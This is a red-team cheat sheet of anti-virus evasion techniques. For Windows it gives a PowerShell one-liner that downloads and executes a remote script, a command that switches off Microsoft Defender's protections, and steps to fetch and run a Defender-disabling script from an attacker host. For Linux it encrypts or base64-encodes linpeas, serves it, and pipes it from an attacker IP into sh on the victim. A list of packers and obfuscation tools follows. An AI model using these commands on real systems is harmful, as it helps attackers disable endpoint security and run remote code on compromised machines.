Anti-Virus Evasion Techniques

Windows

• Download and execute via Invoke expression: powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
• Get the installed AV Product: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
• Disable AV: Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableBlockAtFirstSeen $true -DisableIOAVProtection $true -DisablePrivacyMode $true -SignatureDisableUpdateOnStartupWithoutEngine $true -DisableArchiveScanning $true -DisableIntrusionPreventionSystem $true -DisableScriptScanning $true -DisableRemovableDriveScanning $true -SubmitSamplesConsent 2 -MAPSReporting 0 -HighThreatDefaultAction 6 -Force -ModerateThreatDefaultAction 6 -LowThreatDefaultAction 6 -SevereThreatDefaultAction 6
• If that doesn't work use this script to disable Defender:
  • Warning! Will reboot the target!
  • disable-defender.ps1
  • Invoke-WebRequest -Uri http://{LHOST}:{LPORT}/disable-defender.ps1 -OutFile disable-defender.ps1
  • .\disable-defender.ps1 -Delete
• Windows Command-Line Obfuscation
• AMSI.fail

Linux

#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

To explore

• ProtectMyTooling: Multi-Packer wrapper letting us daisy-chain various packers, obfuscators and other Red Team oriented weaponry
• PEzor: Open-Source Shellcode & PE Packer
• amber: Reflective PE packer.
• GitHub - scrt/avcleaner: C/C++ source obfuscator for antivirus bypass
• peekaboo: Simple undetectable shellcode and code injector launcher example. Inspired by RTO malware development course.
• SharpCradle
• SharpNoPSExec: Get file less command execution for lateral movement.
• InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation tools
• GitHub - LuemmelSec/Pentest-Tools-Collection
• awesome-executable-packing: A curated list of awesome resources related to executable packing
• A blueprint for evading industry leading endpoint protection in 2022 | Vincent Van Mieghem
• RoseSecurity/Anti-Virus-Evading-Payloads
• GitHub - rasta-mouse/ThreatCheck: Identifies the bytes that Microsoft Defender / AMSI Consumer flags on.
• GitHub - sinfulz/JustEvadeBro: JustEvadeBro, a cheat sheet which will aid you through AMSI/AV evasion & bypasses.
• GitHub - CMEPW/BypassAV: This map lists the essential techniques to bypass anti-virus and EDR

Relevant Note(s): Antivirus Evasion